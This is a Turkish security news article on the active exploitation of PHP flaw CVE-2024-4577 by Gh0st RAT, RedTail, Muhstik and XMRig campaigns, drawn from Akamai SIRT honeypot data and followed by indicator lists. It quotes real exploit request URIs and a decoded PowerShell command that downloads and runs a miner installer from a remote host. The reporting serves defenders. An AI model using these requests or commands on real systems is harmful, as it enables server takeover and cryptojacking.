PHP’deki kritik bir güvenlik açığı, CVE-2024-4577 olarak izleniyor ve Haziran 2024’te kamuoyuna açıklanmasından sadece birkaç gün sonra tehdit aktörleri tarafından aktif olarak istismar ediliyor. Bu güvenlik açığı, öncelikle Çince ve Japonca dil ayarlarını kullanan Windows sistemlerinde CGI modunda çalışan PHP kurulumlarını etkiliyor, ancak daha geniş bir kurulum yelpazesini etkileyebilir.
Akamai Güvenlik İstihbarat Tepki Ekibi (SIRT), ifşa edilmesinden itibaren 24 saat içinde bu güvenlik açığını hedef alan çok sayıda istismar girişimi tespit etti. İstismarın kolaylığı, çeşitli tehdit aktörleri tarafından hızla benimsenmesine yol açtı.
“Kritikliği belirlemedeki faktörlerden biri, istismarın kolaylığıdır ve bu, bir tehdit aktörünün uygulaması için oldukça basittir. RCE’yi başarmak için, bir saldırganın sunucuya PHP kodu göndermesi ve (yanlış) yorumlanması gerekir.” dedi Akamai.
"Is Your System Under Attack? Try Cynet XDR: Automated Detection & Response for Endpoints, Networks, & Users!"- Free Demo
Kötü Amaçlı Yazılım Kampanyaları Kusurdan Yararlanıyor
Akamai araştırmacıları, bu açığın aşağıdakiler de dahil olmak üzere çok sayıda kötü amaçlı yazılım kampanyasında kötüye kullanıldığını gözlemledi:
- Hayalet FARE: Almanya’daki bir sunucudan kaynaklanan saldırılarda 15 yıllık bir uzaktan erişim aracı kullanıldı. Kötü amaçlı yazılım kendini yeniden adlandırdı ve bir komuta ve kontrol sunucusuna işaret etti.
- RedTail Kripto Madenci: Bir kripto madenciliği işleminin, x86 RedTail kripto madenciliği kötü amaçlı yazılımını indiren bir kabuk betiğini alıp yürütmek için bu güvenlik açığını kötüye kullandığı tespit edildi.
- Muhstik kötü amaçlı yazılımı: Başka bir kampanya, kripto madenciliği ve DDoS amaçlarıyla IoT cihazlarını ve Linux sunucularını hedef alan Muhstik kötü amaçlı yazılımının bir türünü indirdi.
- XMRig: XMRig kripto madencisini uzak bir madencilik havuzundan çalıştıran bir betiği indirmek ve çalıştırmak için PowerShell kullanıldı.
Açıklamadan 24 saat sonra, SIRT, Gh0st RAT kötü amaçlı yazılımının bu güvenlik açığını hedef almaya çalıştığını gözlemledi. UPX ile paketlenmiş bir Windows yürütülebilir dosyası olan kötü amaçlı yazılım, Almanya merkezli bir komuta ve kontrol sunucusuna işaret gönderiyor ve tespit edilmekten kaçınmak için adını değiştiriyor.
RedTail Kripto Madenci
SIRT honeypot’ları CVE-2024-4577’yi kullanan bir RedTail kripto madenciliği operasyonu tespit etti. Saldırgan, Rusya merkezli bir IP adresinden kripto madenciliği kötü amaçlı yazılımını indirmek ve yürütmek için bir kabuk betiği kullandı.
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
URI:
/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
POST DATA:
Muhstik kötü amaçlı yazılımı
Bir diğer kampanya ise kripto madenciliği ve dağıtılmış hizmet engelleme (DDoS) saldırıları için Nesnelerin İnterneti ve Linux sunucularını hedef alan Muhstik adlı kötü amaçlı yazılımı indiren bir kabuk betiğini içeriyordu.
User-Agent: python-requests/2.22
URI:
/?%ADd+allow_url_include%3D1+-d+auto_prepend_file%3Dphp://input
POST DATA:
;echo 1337; die;XMRig
Dördüncü kampanya ise, uzak bir madencilik havuzundan kripto madencisini çalıştırmak için bir betiği indirmek ve çalıştırmak amacıyla PowerShell komutlarının kullanıldığı XMRig’i içeriyordu.
URI:
/test.hello?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input
POST DATA (Base64 Encoded):
POST DATA (Base64 Decoded):
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://download.c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.bat', $tempfile); & $tempfile 49w8gsLw7UwUVszUBtYujdN1McNkoeYucTctaePX8nmbjKABzJ9S1rigWdh5EiUT1z4NPAPchxT7RaJXN3fURUpM6F6KGjy; Remove-Item -Force $tempfile"Önerilen Azaltma Önlemleri
Akamai, etkilenen kuruluşlara sistemlerini hızla yamalamaları ve tehlike göstergelerini (IOC) izlemeleri tavsiyesinde bulunuyor.
Manuel modu kullananlar, Komut Enjeksiyon Saldırısı grubunun veya belirli ilgili kuralların “Reddet” moduna ayarlandığından emin olmalıdır. Akamai, bu güvenlik açığı için taramada bir artış gözlemledi ve durumu yakından izlemeye devam ediyor.
Join our free webinar to learn about combating slow DDoS attacks, a major threat today.
SOC/DFIR Ekipleri için uzlaşma göstergeleri
Hayalet FARE
SHA256 karma
A646ebf85afa29ae1c77458c575b5e4b0b145d813db028435d33b522edccdc0e
Dosya adları
- A646ebf85afa29ae1c77458c575b5e4b0b145d813db028435d33b522edccdc0e.exe
- phps.exe
- Iqgqosc.exe
IPv4 adresleri
- 147.50.253[.]109
- 146.19.100[.]7
- 23.237.182[.]122
BangCloud, IOC’leri VirusTotal’daki hitlerle ilişkilendirdi
- 147.50.253[.]220
- 147.50.253[.]222
- 147.50.253[.]225
- 147.50.253[.]219
- 147.50.253[.]231
- 147.50.253[.]99
- 147.50.253[.]100
- 147.50.253[.]228
- 147.50.253[.]5
- 147.50.253[.]4
- 154.197.12[.].156
- 147.50.253[.]110
- 147.50.253[.]102
- 147.50.253[.]218
- 147.50.253[.]23
- 147.50.253[.]11
- 147.50.253[.]163
- 147.50.253[.]2
- 147.50.253[.]116
- 147.50.253[.]18
- 147.50.253[.]109
- 147.50.253[.]106
- 147.50.253[.]112
- 147.50.253[.]111
- 147.50.253[.]7
- 147.50.253[.]104
- 147.50.253[.]167
- 147.50.253[.]119
- 147.50.253[.]113
- 147.50.253[.]103
- 147.50.253[.]107
- 147.50.253[.]105
- 147.50.253[.]114
- 147.50.253[.]108
- 147.50.253[.]101
- 147.50.253[.]117
- 147.50.253[.]115
- 147.50.229[.]12
MITRE ATT&CK teknik
- T1091 — Çıkarılabilir Ortam Aracılığıyla Çoğaltma
- T1547 — Önyükleme veya Oturum Açma Otomatik Başlatma Yürütmesi
- T1056 — Giriş Yakalama
- T1112 — Kaydı Değiştir
- T1003 — İşletim Sistemi Kimlik Bilgisi Dökümü
- T1120 — Çevresel Aygıt Keşfi
- T1027 — Karmaşık Dosyalar veya Bilgiler
- T1071 — Uygulama Katmanı Protokolü
- T1082 — Sistem Bilgisi Keşfi
- T1571 — Standart Dışı Bağlantı Noktası
- T1057 — Süreç Keşfi
Kırmızı kuyruk
IPv4 adresleri
185.172.128[.]93
SHA256 karmaları
- 2c602147c727621c5e98525466b8ea78832abe2c3de10f0b33ce9a4adea205eb
- 0d70a044732a77957eaaf28d9574d75da54ae430d8ad2e4049bd182e13967a6f
- ab897157fdef11b267e986ef286fd44a699e3699a458d90994e020619653d2cd
- 9753df3ea4b9948c82310f64ff103685f78af85e3e08bb5f0d0d44047c63c315
- 19a06de9a8b66196fa6cc9e86824dee577e462cbeaf36d715c8fea5bcb08b54d